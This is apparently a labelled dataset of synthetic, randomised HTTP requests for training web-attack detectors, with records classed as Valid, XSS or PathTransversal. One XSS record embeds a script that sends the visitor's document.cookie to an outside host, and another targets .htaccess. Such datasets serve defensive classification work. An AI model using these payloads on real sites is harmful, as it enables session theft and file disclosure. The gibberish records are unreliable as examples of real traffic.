Proxy-Authorization: NTLM RmE3Nm9vdGNCZ3BlaXk4ZHJ3aHNiRWVueWRucWVuZ20=
Authorization: NTLM cmVsOVRkY2Fob3I1MUNnam9jZWE0dG9yZW9vZGFnczhudHd6ZHNkdG9i
Range: 23-,057-,45-
Referer: http://uregAty.be/hseui5/senii/rlIeonrv.tar
TE: trailers,trailers,gzip;q=0.9
Trailer: Accept-Encoding
User-Agent: esPr (9I0M0@rX; e0d4P40; aaX1.Q4; aWJ_nNGU3)
UA-CPU: 68000
UA-Disp: 757,752,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 395x881
Via: glhd7/1.4 www.REHk.gif
Transfer-Encoding: deflate
Upgrade: ridti/5.6, m2mn/9.7, 5cse/3.2, eaEos/5.1
Warning: 248 www.elmeri.shtml "SdvreCihiq" 
X-Forwarded-For: 235.34.139.147
X-Serial-Number: 544350626543951868
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48981
Start - Id: 16082
class: Valid
GET /tdKOpositionfx/eEt/eJyoLhg6_j/4vFatiiY7zre/tkPM2L.js? HTTP/1.0
Host: www.t8iuoud.biz
Connection: otts
Accept: */*;q=0.9
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: ai5-ersaus;q=0.1, rjoimr-O, yal1v-iknic;q=0.6, 7beuaae-o;q=0.7
Cache-Control: no-store
Client-ip: 46.71.143.53
Cookie: cAejTsetn=%ucnate0aebe;IMEnAW4TRllQ=nTqvWeXl
Cookie2: $Version="78"
Date: Tue, 09 May 06 06:07:32 CET
ETag: W/"emX59h9jmNVMMgNH"
Expect: srptu=rstbap1;tasgTa=eofhehoe
From: nsodrd@t9uule.biz
If-Modified-Since: Wed, 24 May 06 22:20:47 CET
If-Unmodified-Since: Wed, 17 Feb 10 08:13:50 CET
If-Match: "JINeOL12m01uklIXAw"
If-None-Match: *
If-Range: Sat, 14 Nov 09 08:48:01 GMT
Max-Forwards: 2
MIME-Version: 5.7
Pragma: p=oOSNa
Proxy-Authorization: Digest cnonce="Sas09gl4"
Authorization: esp9po 9o4fh=ttpe
Range: 303812-992,8-0,-1
Referer: http://2storheB.be/aeznsE/ni5aii/9Echa/osho1rt/oeaini1s.asp
TE: trailers,chunked;q=0.1,gzip
Trailer: Trailer
User-Agent: Mozilla/0.8 (compatible; MSIE 7.7; SunOS sun4u; adit)
UA-CPU: x86
UA-Disp: 489,939,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 892x2376
Via: 9.8 www.h7sdzd0.gif
Transfer-Encoding: gzip
Upgrade: i4yIiA/2.7, dii5he/8.6, ahi/6.9, hzes7/4.4, 3Ooah/2.1
Warning: 947 237.230.136.104 "emhixriherlerH7tA" "Fri, 12 Jan 07 18:24:13 UTC"
X-Forwarded-For: 44.155.173.100
X-Serial-Number: 6495346475
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16082
Start - Id: 4793
class: Valid
PUT /3wbHDA/aUNxb7/tqBV/wDQWB/Igvmanvh/n5v6UxzKeYkh-TBBxTzt/teiooy6hdHmeiTg2GrlY/PbiframewKsmeta/nS528AhyT-0vva-iRX.gif? HTTP/1.1
Content-Length: 185
Content-Language: kr
Content-Encoding: compress
Content-Location: http://tnbego8.uk/0nlLyDds/erajttol/irdRt.fgf
Content-MD5: aURNdDBuYWRkbHR5YXNlcw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 30 Apr 05 02:52:26 CET
Last-Modified: Mon, 06 Jun 05 12:48:48 CET
Host: 206.9.49.70
Connection: keep-alive
Accept: video/quicktime;q=0.1, application/*, text/*;q=0.9
Accept-Charset: iso-8859-6;q=0.0, iso-8859-8-i
Accept-Encoding: compress;q=0.5, deflate, compress
Accept-Language: *
Cache-Control: max-age=02972
Client-ip: 204.142.193.74
Cookie: 51jchaglrrhoteA=6dropeeoasystemSrMc;1O_3=7;LdtahyRuite=ank;einfaapctQdte3=azn;nab=evbscript=7Ltae;aSei=86
Cookie2: $Version="4"
Date: Sat, 16 Jan 10 13:51:18 GMT
ETag: "ov8k5Q.letHDD7S"
Expect: 100-continue
From: ekude@eAbatar.net
If-Modified-Since: Fri, 21 Oct 05 06:41:13 CET
If-Unmodified-Since: Sun, 21 Dec 08 01:39:01 CET
If-Match: "-cm45Wo30Wg7JO6trK"
If-None-Match: "WgH1nBLD9IylNey"
If-Range: "@IB.EXfFUZFEOGeo"
Max-Forwards: 65
MIME-Version: 6.0
Pragma: no-cache
Proxy-Authorization: Basic MHJ0eWU6ZWV3c29u
Authorization: Basic Y2VqRVBpZTpoc2FldHR4
Range: -71751
Referer: /toirar/acwtaWis/ktmh/glstf/wa9e.php
TE: deflate,trailers
Trailer: If-Unmodified-Since
User-Agent: dbS_gcN http://www.lico.com
UA-CPU: x86
UA-Disp: 109,747,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 904x222
Via: 1.7 www.Ampw.js, ita/4.4 www.miwe.jpg, HTTP/6.5 239.37.146.2
Transfer-Encoding: gzip
Upgrade: shd/9.1
Warning: 812 www.3rh8ciut.jpeg "aaaatqesNn" "Tue, 14 Mar 06 17:06:45 CET"
X-Forwarded-For: 247.63.27.49
X-Serial-Number: 095672914255730
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

h.flJs3=tB0OVsO&mnlt=1dascript~php-eysad&oaty4lop6sjed=toiAu3teter&oVjrire=0&B5B171CXII=8&utttafpI2L=system(?a6&Oe2nWt=471698&h0=wsip&cat0lW=i.K.TfVU1&USfiri=285&f1iopoeuayiriao=6

End - Id: 4793
Start - Id: 47533
class: XSS
GET /a0z/iN.wAQvIdsPu/ttf9aspuepsnqenh/hDaNsnl/8V0JXhNANLO1J2G/m7m5S-S0qQoGiJ_-yepz/ld@scriptfromG3SWusrMTR/ihhOr86.aspx?n1g=1981&tonhjeeehdmtn=%3C%3Cscript++%3E%5Bdocument.location.replace+%28%27http%3A%2F%2Fwww.artechon.com%2Fcgi-bin%2Ficetriinng.cgi%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript+++%3E&Uayoieas=+thlocationuRpwinntt%24e78&ja4at8Ef=telnettot HTTP/1.0
Host: 240.132.197.237:80
Connection: close
Accept: video/*
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: 7heM-z, ht-cr;q=0.1, l0aVeLE-hzgn, n-AgwjN;q=0.1
Cache-Control: only-if-cached
Client-ip: 37.55.220.136
Cookie: 69QiKtp=e;C2s6e=o-
Cookie2: $Version="0"
Date: Tue, 17 Feb 04 16:09:15 UTC
ETag: W/"MF.rOlxIiF0Dx6w"
Expect: pnInt
From: rxai5au@cfrdhneel.st
If-Modified-Since: Tue, 14 Dec 04 18:32:07 CET
If-Unmodified-Since: Wed, 25 Feb 04 14:53:05 UTC
If-Match: "JB@tTM7-v87QCR89Sz_"
If-None-Match: *
If-Range: "UL_xPTr96AZwl97pC"
Max-Forwards: 17
MIME-Version: 4.7
Pragma: bo=es
Proxy-Authorization: Digest uri=http://www.nihe.biz/7s36/4eafim5e/iflioc.php3
Authorization: NTLM aW51YTFhZWlmYTNzdWltYTlMYTJkcjdycm40YXRoY2U3THM=
Range: 924-,916951-
Referer: /nnrkoah.ace
TE: gzip
Trailer: TE
User-Agent: Wned (nwbKFGMQb)
UA-CPU: 68000
UA-Disp: 050,2452,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 2187x3503
Via: 7.5 39.34.171.134, 0.0 www.hfnpceem.gif
Transfer-Encoding: a5cgi; twar7eu=nly7r
Upgrade: atsa/8.3
Warning: 758 232.178.55.106 "aerbantiefsyete" 
X-Forwarded-For: 119.148.205.131
X-Serial-Number: 870651819
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47533
Start - Id: 29829
class: Valid
GET /tVzVn9EuDEO/bK91DBisAsG.tiff?2Eh=nlqls%7Eispco8PtHo%3Ao%5Bs&diyEfi=94i&6elwapito4=Hr&tnassscersntu=ybEezit0&uooaG=e1ehre%40+5d&limgnm1JvupdateqB-f=nECooSQYj&eyoeHirghslhf=edeonzNebee&body@9oupdate8=60&3WdqG=16177924&4wdi5q=execs5&aBe=94475&Do9nZ=muGrS3tOwCe HTTP/1.1
Host: 213.182.216.246
Connection: close
Accept: */*
Accept-Charset: utf-8;q=0.8
Accept-Encoding: identity;q=0.0, identity;q=0.2, deflate;q=0.5, deflate;q=0.8
Accept-Language: oacgd-wlgtn, sc5t95-ybti, ezfEsi-tWhitS1;q=0.8, cuib-trsiyapa;q=0.0
Cache-Control: no-cache
Client-ip: 64.126.244.88
Cookie: lerR=lfatbodynninne;thathre0efnI=1240501;dae1ai=9;oen4sdtx=ilt;066-=tQybt;hzbltEtn=oFaLKlw
Cookie2: $Version="7"
Date: Fri, 17 Mar 06 17:18:15 CET
ETag: "0AVT7Fy1MSqi0kB"
Expect: yiie7bb
From: piihht@ohiilnlrs.biz
If-Modified-Since: Sun, 29 May 05 10:53:41 UTC
If-Unmodified-Since: Tue, 10 Apr 07 15:14:46 GMT
If-Match: *
If-None-Match: "Xx1aDe3_BDIZqaxBRRVs"
If-Range: "wm1MMgtZ9BbV@Bq63"
Max-Forwards: 5
MIME-Version: 7.9
Pragma: yestue=srjah
Proxy-Authorization: Digest opaque="iebwoe"
Authorization: Basic bDFuSWJodU86OW40eW1u
Range: 9669-56204,57635-,19451-
Referer: http://www.rfaelp.st/te1f/eeataqt.rar
TE: deflate,trailers,chunked
Trailer: Expect
User-Agent: Mozilla/7.7 (Windows; U; Win98 0.0; aa-ne; rv:4.7.2) Gecko/49846190
UA-CPU: 68000
UA-Disp: 793,154,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 238x9907
Via: HTTP/6.9 www.siem4.gif, tlsor/9.9 129.37.172.166:3726
Transfer-Encoding: identity
Upgrade: eao/6.7, qpa/6.7
Warning: 757 171.183.186.152:6 "lkOups" 
X-Forwarded-For: 22.79.136.228
X-Serial-Number: 211553371251
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 29829
Start - Id: 23014
class: Valid
GET /1dXNUg7yc/2d7zPntcJ.php3?3Uy9vdG2oRc=oouegesgh4tt&u8GVge3stdinbh2=5&O6mI4copystyletpkt=6318535&qGautoexec9M=015346&rnWdxnett8ao=or1h&osu6nlode6=sliDe_xJa1x&heewaoi=dige&oAtedzxcevCteic=308826701&iar9pstlgoxvb=6p+Niixhtvm&_wp-b8=oieniTdctrr2lrb&asHistnu=tio&eritsprneEEo=lhtospsIaqfva&eeew3heli9ffeR=8325&am7w6y=l6VfyjHGSBgp&d9Aqb=ges HTTP/1.0
Host: www.altts.st:80
Connection: close
Accept: application/*;q=0.8, image/*
Accept-Charset: us-ascii
Accept-Encoding: gzip, gzip
Accept-Language: *;q=0.5
Cache-Control: max-stale
Client-ip: 83.68.194.74
Cookie: ldinobhvglolo=snullpuw
Cookie2: $Version="748"
Date: Tue, 23 Sep 08 11:42:30 GMT
ETag: "DH4D@c.p46C-WPHgl"
Expect: 100-continue
From: reCec@atistonN.com
If-Modified-Since: Mon, 09 Jan 06 08:31:56 GMT
If-Unmodified-Since: Fri, 14 Jan 05 06:22:11 UTC
If-Match: "e3qtrFNBq3SVL9-9vEr"
If-None-Match: *
If-Range: *
Max-Forwards: 24
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: eodea teteee5=iaeplae
Authorization: Digest uri=http://www.4s2dpdh.it/r2o4/XEhnbM/HHnnBne/hoebuc/w8ogkAan.jsp
Range: -87251,3-5709,60373-
Referer: /r1tyA9.fgf
TE: chunked,trailers
Trailer: Accept-Charset
User-Agent: totoeuiif/2.7.5
UA-CPU: MIPS
UA-Disp: 8779,521,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 465x0327
Via: 7.1 www.8kui.png, HTTP/2.3 www.aam4.htm:7
Transfer-Encoding: compress
Upgrade: tiei/4.5, f2y/4.6
Warning: 590 www.opmscngj.html "lswlRodnknfotDgav" "Wed, 07 Apr 10 19:07:32 GMT"
X-Forwarded-For: 242.37.131.17
X-Serial-Number: 782598520003
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23014
Start - Id: 26570
class: Valid
GET /l9VaFFpJkkjcLyh/eTV/tyrfwsansEtoDuoyif/Kne.ZjZAx.php4?pBl342n8htcaHst=fejerrUtmpcecmdlsNduutHusr&y0Ateoabc=290892 HTTP/1.1
Host: www.oeigdu.biz
Connection: keep-alive
Accept: text/*;q=0.3
Accept-Charset: iso-8859-3, macintosh;q=0.5, iso-8859-8-i;q=0.3, x-mac-ce
Accept-Encoding: *;q=0.1
Accept-Language: *;q=0.2
Cache-Control: no-store
Client-ip: 126.247.210.228
Cookie: RiulnfceLedpnde=tDHS93uKen;smcitdhTJn=11498
Cookie2: $Version="969"
Date: Mon, 20 Oct 08 19:01:32 CET
ETag: W/"x1vA9txJotiTBeEn4fk"
Expect: re3Te=Etya;hfIed2s
From: ndorli@calYa.it
If-Modified-Since: Sun, 10 Apr 05 13:26:28 GMT
If-Unmodified-Since: Thu, 21 Jan 10 04:30:17 CET
If-Match: *
If-None-Match: "BF7fAdkd8Imf3orGu"
If-Range: Tue, 10 Feb 09 23:11:54 GMT
Max-Forwards: 2
MIME-Version: 9.1
Pragma: dEnt='Srutetfs'
Proxy-Authorization: Basic ZWh1YTVnOnNvZTc=
Authorization: Digest nonce
Range: 5377-633943,-28808
Referer: http://ohg1.gov/edOTgn.pl
TE: trailers,trailers
Trailer: Accept-Language
User-Agent: Mozilla/2.5 (X11; U; SunOS sun4u 8.2; en-e6; rv:2.3.0) Gecko/50706062
UA-CPU: Sparc
UA-Disp: 0886,5567,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 6083x8354
Via: HTTP/1.9 161.198.99.43, HTTP/9.1 www.atqoss.gif:3131
Transfer-Encoding: eeur5m
Upgrade: fmyf/7.7, s17U/8.8, yna/1.4, uaae/7.2, crI/4.0
Warning: 032 www.oghexy5t.html "njwthy" 
X-Forwarded-For: 14.228.155.87
X-Serial-Number: 693373977262
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26570
Start - Id: 20458
class: Valid
GET /9XNXcopyz0fr/Metsn5iy/sAxJNiD.shtml? HTTP/1.1
Host: www.eojof.uk
Connection: xett
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: identity;q=0.4, identity;q=0.4, compress;q=0.5, deflate;q=0.0, identity
Accept-Language: *
Cache-Control: max-stale=75333
Client-ip: 83.158.227.172
Cookie: mrohn2fe=zrey5phH<gOaj;i8oonheuruee=l6siwdEntaAtna;_gWp=jrDAmvALb9A2aecs;31ao=5549366;o9eIeu=aRdnrzXGRU
Cookie2: $Version="2"
Date: Fri, 17 Feb 06 21:10:51 GMT
ETag: W/"ULyg1rb0SVstg9wIa"
Expect: 100-continue
From: baet0r@XRdlittsO.fr
If-Modified-Since: Sun, 28 Nov 04 14:49:01 GMT
If-Unmodified-Since: Tue, 14 Dec 04 16:23:51 GMT
If-Match: "wQVNi6FLVZV7ascDGG"
If-None-Match: "lJHxTm2iO0WT@ne-5m"
If-Range: Thu, 09 Mar 06 01:01:00 UTC
Max-Forwards: 7
MIME-Version: 9.2
Pragma: no-cache
Proxy-Authorization: Digest cnonce="ekOhn5"
Authorization: eIIr dceso=5qeES
Range: -896,61-724379,-171
Referer: /d9sc/ouifltSE/2ovnsq/iteqt/ln7of8ut.rar
TE: trailers
Trailer: From
User-Agent: riiqskkt/5.3
UA-CPU: 68000
UA-Disp: 0456,206,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 6158x619
Via: 0.5 www.otnoesoq.tiff, HTTP/4.3 194.73.246.13:27303
Transfer-Encoding: compress
Upgrade: tt2t/3.5, h7sw/2.6, orae/2.0, use/2.6, esmt/6.9
Warning: 884 199.42.171.133 "deaa4rmnb5" "Fri, 14 Aug 09 11:14:45 UTC"
X-Forwarded-For: 69.102.148.135
X-Serial-Number: 4599369837031891295
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20458
Start - Id: 5426
class: Valid
POST /rIE-F-2dKQY/ptTVJyVLDYEqxiX_XBX/tmpKExcsL/d1-/0rSe_eyPRR1vf@/rtZnJvOliNpogUTa-/o1y1o8brqr1ftten/admin.Ddb2uocscriptH/Cmagiteteyai/n-jKt/a1yG.59v2.php3? HTTP/1.0
Content-Length: 29
Content-Language: alPhia3s,akaL,iotolnq
Content-Encoding: gzip
Content-Location: http://am2eorTt.it/77enuM/sibeasea.tiff
Content-MD5: NWJ5aXBlaHNlZHR6YW4wMA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 16 Dec 06 20:50:02 GMT
Last-Modified: Tue, 30 Dec 08 09:33:57 UTC
Host: 108.98.147.81:0
Connection: hsir
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: *
Accept-Language: esaomt-meere, dooib-u, eoaAioee-ai, nbuui9p-e
Cache-Control: max-age=7
Client-ip: 189.178.6.210
Cookie: kuo=42571;eCGIS2=passwd %u;ycc2tr=0288;xepVaoftN6rna2m=ovK_wu9a5
Cookie2: $Version="13"
Date: Fri, 22 Aug 08 19:23:25 GMT
ETag: W/"EjPQdMCEga0aWATWsQg"
Expect: eltev=wilefet
From: duemse@aiti.it
If-Modified-Since: Thu, 14 Feb 08 15:13:59 GMT
If-Unmodified-Since: Sat, 19 Sep 09 22:45:37 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 13 Feb 05 13:43:08 CET
Max-Forwards: 0
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: Basic SWF6OWNyOmNlZk50
Authorization: Digest qop=auth
Range: 11-,07-65786
Referer: /mac5/sui5pr/eohnd.wav
TE: trailers,deflate;q=0.5
Trailer: Expect
User-Agent: Mozilla/8.5 (X11; U; Linux i586 9.7; n8-o5; rv:4.2.1) Gecko/76554791
UA-CPU: MIPS
UA-Disp: 1986,145,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 849x786
Via: FTP/9.4 10.205.140.213, 2.1 www.sws1.gif
Transfer-Encoding: compress
Upgrade: amueL/0.0, Etejai/3.0, Exil5t/1.5, tzs/6.8
Warning: 694 185.246.0.14:2 "petyplftininahn5enz" "Fri, 15 Feb 08 05:48:04 GMT"
X-Forwarded-For: 180.40.114.160
X-Serial-Number: 20359821901
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

tHais=ocougVe&saaesTt=ywQ997P

End - Id: 5426
Start - Id: 34725
class: Valid
PUT /u3ZVIF3jw9LAhRpk/eyy9eh05/eEnoyir/eie8iveaiiOdr3n/rHH@/c7Z075kSU/novoegWnehmehe/saareShr6sHeeoihcuro.php3? HTTP/1.0
Content-Length: 30
Content-Language: dia6ionr
Content-Encoding: identity
Content-Location: http://6tcozc.it/yooroyr.js
Content-MD5: ZWFjYnAxZW5iZG5pbXRsYw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 22 Nov 04 24:27:19 GMT
Last-Modified: Wed, 14 Feb 07 02:03:39 GMT
Host: 140.106.123.48
Connection: epAN5il
Accept: */*;q=0.3
Accept-Charset: iso-2022-jp, cp-950;q=0.9, windows-1251;q=0.7, iso-8859-9, iso-8859-4
Accept-Encoding: compress, deflate
Accept-Language: fatS-Wgtwhi, rtss87dl-retibc1
Cache-Control: max-age=52666
Client-ip: 63.100.109.215
Cookie: 9e7elem64ix1r9t= 7ln zooejc;dd=rh=p[Qesrer;ut8ayHwnF7eor=e);osP=konquRz
Cookie2: $Version="53"
Date: Sat, 08 Jul 06 18:44:12 CET
ETag: W/"tvaIz-1JxMiRT1iZc"
Expect: 100-continue
From: tta1oTo@Tdedrs.biz
If-Modified-Since: Sat, 24 Oct 09 05:39:36 CET
If-Unmodified-Since: Sat, 19 Jun 04 12:57:24 UTC
If-Match: *
If-None-Match: "fvrM_rD-k8CcP7b1Z"
If-Range: *
Max-Forwards: 191
MIME-Version: 5.6
Pragma: d='esh0is'
Proxy-Authorization: Basic bmlHR3BwOm9XbW1NZ28=
Authorization: te1odf tiidr=H26tf
Range: 27601-82680,576792-311040,-975285
Referer: http://www.Llril.st/oiTor/nkeentr/eftueteT/ehtsDyom/nenhOHya.bin
TE: chunked;q=0.3,trailers,deflate;q=0.7
Trailer: Accept-Charset
User-Agent: Mozilla/0.8 (X11; U; SunOS sun4u 9.2; ht-pz; rv:7.8.1) Gecko/78745645
UA-CPU: x86
UA-Disp: 497,2476,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 420x8395
Via: 3.2 www.8wuny.jpg
Transfer-Encoding: shyeea; vbtg=jodphNyr
Upgrade: btCas3/7.1
Warning: 362 www.gij8n.css:7492 "7alorineeecde" 
X-Forwarded-For: 102.210.121.17
X-Serial-Number: 17723579277611262634
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

nAaSna1orYiin=ln9au&4esf=71591

End - Id: 34725
Start - Id: 46087
class: PathTransversal
POST /oa/qp0/usdtesehaihjdEtd/brgobnlo/sCjm3tsS6tm2t/a3taUgtju6wapocNl/rIldUFhb/ahreuAhiItwnwuor5Wt/gSneOsiTedesthdppr.css? HTTP/1.0
Content-Length: 101
Content-Language: drooul,cdel,hmtG0rI
Content-Encoding: compress
Content-Location: http://ecgvc.net/6ngsl5/srwlctid/nsokoO/rrqlytcq.php3
Content-MD5: bXRpbHJyZXRpb2VkY29lbw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 08 Feb 10 04:42:56 UTC
Last-Modified: Wed, 22 Aug 07 17:48:49 UTC
Host: www.osWOean.org:61
Connection: close
Accept: */*
Accept-Charset: big5;q=0.9, koi8-r;q=0.1
Accept-Encoding: *
Accept-Language: 3-rtcih, r1l-7nHps;q=0.7, bneee9-upenKoss;q=0.4, enxLAne-yaoeh
Cache-Control: max-stale
Client-ip: 242.237.108.67
Cookie: oesi=qI;nn=child;auhnsu=ftp\ioa8reycmPm%sdt[m@;ssib4soa=aq4t
Cookie2: $Version="065"
Date: Sun, 29 Nov 09 13:59:45 UTC
ETag: W/"TbF8453pah_RFw4TC"
Expect: easElso=8jRolIq
If-Modified-Since: Wed, 13 Jun 07 03:37:29 CET
If-Unmodified-Since: Mon, 25 Jan 10 13:03:58 GMT
If-Match: *
If-None-Match: "GZlug9e0KKPhF418Mqe"
If-Range: *
Max-Forwards: 05
MIME-Version: 4.9
Pragma: er='vaG'
Proxy-Authorization: NTLM bm9qb29xc2tyZXBudGVzdGNzeWVuOW1mYXlUbWFlZXJuZXNsaWVkNGJpYW5zY3Jz
Authorization: Digest algorithm=MD5
Referer: /tArlh2t/ttthte/iiab/nusosqu.rar
TE: trailers,trailers,trailers
Trailer: Date
User-Agent: opohe0xck/6.3.9.1
UA-CPU: x86
UA-Disp: 0405,3924,32
UA-Color: color32
UA-Pixels: 1090x096
Via: 2.8 171.97.130.37, FTP/2.7 www.naucs.gif
Transfer-Encoding: compress
X-Forwarded-For: 169.44.253.54
X-Serial-Number: 6624600732938484
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

htMnoaomo=gendiS&gL)f8iC&rS=rhjo &Nozk=e:/.htaccess~&2eqDmoe=iadminisug&d72ioa8=2Lmz9alseHe

End - Id: 46087
Start - Id: 21871
class: Valid
GET /tns/3PLlN8RPpJ.mspx? HTTP/1.1
Host: www.uarsheho.gov
Connection: m3as
Accept: text/*;q=0.7, video/*;q=0.3, image/*
Accept-Charset: euc-jp;q=0.9
Accept-Encoding: 
Accept-Language: rtyt-2xlnal;q=0.9, eqe-kel, rl-Dgdi7;q=0.1
Cache-Control: max-age=81
Client-ip: 124.23.154.34
Cookie: st=1;cksonutle2wqnnq=63;lnnAbtxqniretd=tl
Cookie2: $Version="53"
Date: Thu, 17 May 07 02:07:20 UTC
ETag: "_oWm6wFQ0bxMU5_"
Expect: m4aAehe
From: iese@tecT.fr
If-Modified-Since: Fri, 22 Jul 05 10:53:17 CET
If-Unmodified-Since: Mon, 10 Oct 05 12:21:11 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 30 Jan 07 19:11:06 UTC
Max-Forwards: 92
MIME-Version: 2.2
Pragma: slccnN=tuiys
Proxy-Authorization: iele gsycpn=cveretgu
Authorization: nhS2bu tseedi=nlphaPac
Range: -34244,001-
Referer: /vnfaksE/oceaetO/hteeinR.png
TE: gzip,trailers
Trailer: Upgrade
User-Agent: ioBWw (8Dk7dea; 7xlx-evus; nxRfK5NM)
UA-CPU: StrongARM
UA-Disp: 649,1976,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 5382x0739
Via: rAhTe/3.1 www.tmea.gif, 9.2 www.bott.png, 4.4 www.neGnd.jpg:9
Transfer-Encoding: Ntmct; Near=morlixr
Upgrade: foarn/6.0
Warning: 312 www.ln8onMov.shtml "tEn0djA" 
X-Forwarded-For: 180.152.252.21
X-Serial-Number: 0932215457430057404
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21871
Start - Id: 13416
class: Valid
GET /nEe/3yi3eal/a-3QAx--w_tmHtGze8/cv@hHNsystemgZt6zqx/1aqaAElua2L/oyLtVlO_hiWV71w@u_Xn/hJH/w1k8v89TX.asp?91aoEszriirick=2272157&9eimEiinatAetsy=2uot&oaioNrgeeiofnhn=iaeDT8Xheham5o&iueuhtbmh5=3406059&lQa49gs9osovA=s2qVg2-LoDx&hus=yssfe&processing-instructionmIG.JGOay-=++Eor4m&jrebeftCnaSAiiH=a%29it0henHviss&uhnnsg7fsury=iGe58hjH7&Yn0ei6avsuttan=788576&fform9Ll3GkAe=%28ueimgairr+2llibr&7hn=26293548&lrlAnf0fehshe3=0654616&8tsstwwwe=aZCegj8 HTTP/1.0
Host: 195.161.170.34
Connection: keep-alive
Accept: text/html;q=0.8, application/*;q=0.8
Accept-Charset: *
Accept-Encoding: identity, identity;q=0.8
Accept-Language: *
Cache-Control: max-age=2
Client-ip: 28.232.68.156
Cookie: kg7n8Eraleamy=iriDornullLt;etGh=af3prbn/iduJte
Cookie2: $Version="0"
Date: Mon, 14 Mar 05 11:31:45 GMT
ETag: W/"XGt9JHATnnAR7TaciAc"
Expect: 100-continue
From: 9Daone@qAlt9.net
If-Modified-Since: Thu, 01 Apr 10 16:04:19 UTC
If-Unmodified-Since: Thu, 18 Feb 10 21:10:01 GMT
If-Match: *
If-None-Match: *
If-Range: "Iip5NlSN7Ox9n1T"
Max-Forwards: 10
MIME-Version: 0.7
Pragma: 7u='anulr'
Proxy-Authorization: NTLM Y2lhb2hzMVNla2IzcndsT2NJQWdyMXJpaXZyMmVlaGVkcjdv
Authorization: k4adtc eatnlart=iohcTief
Range: 7322-
Referer: /rvror6n7/ypoO.mpeg
TE: trailers,trailers
Trailer: Range
User-Agent: Mozilla/8.9 (Machintosh; U; Mac OS X 5.5; e2-r6; rv:5.8.6) Gecko/89228744
UA-CPU: 68000
UA-Disp: 1663,7844,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 020x602
Via: HTTP/7.8 35.134.159.9
Transfer-Encoding: deflate
Upgrade: hnP/8.6, 5u42/5.7, sLv/5.9
Warning: 515 10.196.127.38 "remJrtutyteo" "Sun, 05 Oct 08 13:10:27 GMT"
X-Forwarded-For: 139.167.220.27
X-Serial-Number: 8913868514720115974
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13416
Start - Id: 34924
class: Valid
PUT /notrqaoanobneurhtvn/tNL9ecnemts/tSTNH0Uo8HRbyL/bp5X/mtstseanInemi/pmpuEj.swf? HTTP/1.1
Content-Length: 157
Content-Language: Raruitn
Content-Encoding: identity
Content-Location: /adozisl/n1ltEis.asmx
Content-MD5: aTV5b2VjbW1mc3BvNHJoaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 20 Jul 04 17:32:55 UTC
Last-Modified: Fri, 09 Nov 07 23:49:41 GMT
Host: 179.99.146.240:377
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: dxjrtsn-hdaa, cjen-tw;q=0.4, ceot-em;q=0.4, 9l-euosne
Cache-Control: f=dBet1
Client-ip: 229.74.234.254
Cookie: ty=005515
Cookie2: $Version="932"
Date: Mon, 26 Jul 04 19:43:27 GMT
ETag: "VPeDZV3Za2WLcRfx"
Expect: 100-continue
From: ttenatma@bi1ieaxdra.net
If-Modified-Since: Mon, 09 Aug 04 08:58:55 CET
If-Unmodified-Since: Tue, 10 May 05 17:45:10 CET
If-Match: "OB9h7pr7peD63t_hft"
If-None-Match: "o39brPuviRSJPS1771"
If-Range: Sun, 01 Jan 06 10:33:16 CET
Max-Forwards: 7
MIME-Version: 6.7
Pragma: eihec=itnhruhE
Proxy-Authorization: Basic cFdvaGVzZTpldkhoVXI=
Authorization: ech2 isyb2rha=dbpar9
Range: 26302-,-510,4934-
Referer: http://eswtd.org/gce5naf/afdxoeha/icePmg/hlb61od/dr8mAn.pl
TE: gzip;q=0.2,deflate,trailers
Trailer: If-None-Match
User-Agent: prxinL
UA-CPU: x86
UA-Disp: 7242,197,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 2377x8201
Via: FTP/5.1 134.154.130.176:13
